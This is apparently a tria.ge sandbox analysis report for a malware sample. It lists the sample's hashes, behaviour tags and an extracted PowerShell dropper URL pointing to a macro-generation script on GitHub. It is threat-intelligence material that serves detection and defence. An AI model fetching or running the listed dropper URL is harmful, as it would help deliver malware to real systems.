Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

  • Size

    44KB

  • Sample

    240708-2enr1svcle

  • MD5

    c75e74d9a3c2057a5f53f4eed1fd7d52

  • SHA1

    06279205c38c809a596bc25c3ebade01a1aaf55f

  • SHA256

    e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

  • SHA512

    a8b8ea46df6bf43bda2d23b4943b8732cc69f6404c839649570c42004a919fe668a19760bb4ea363b7e023f291a1c358f4041b0ca1c3868632444e563166382b

  • SSDEEP

    768:Ctvo+rzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSjWRJFlmQQc82J9acM9acyL:qZk3hbdlylKsgqopeJBWhZFGkE+cL2Nc

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Targets

    • Target

      e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

    • Size

      44KB

    • MD5

      c75e74d9a3c2057a5f53f4eed1fd7d52

    • SHA1

      06279205c38c809a596bc25c3ebade01a1aaf55f

    • SHA256

      e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

    • SHA512

      a8b8ea46df6bf43bda2d23b4943b8732cc69f6404c839649570c42004a919fe668a19760bb4ea363b7e023f291a1c358f4041b0ca1c3868632444e563166382b

    • SSDEEP

      768:Ctvo+rzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSjWRJFlmQQc82J9acM9acyL:qZk3hbdlylKsgqopeJBWhZFGkE+cL2Nc

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks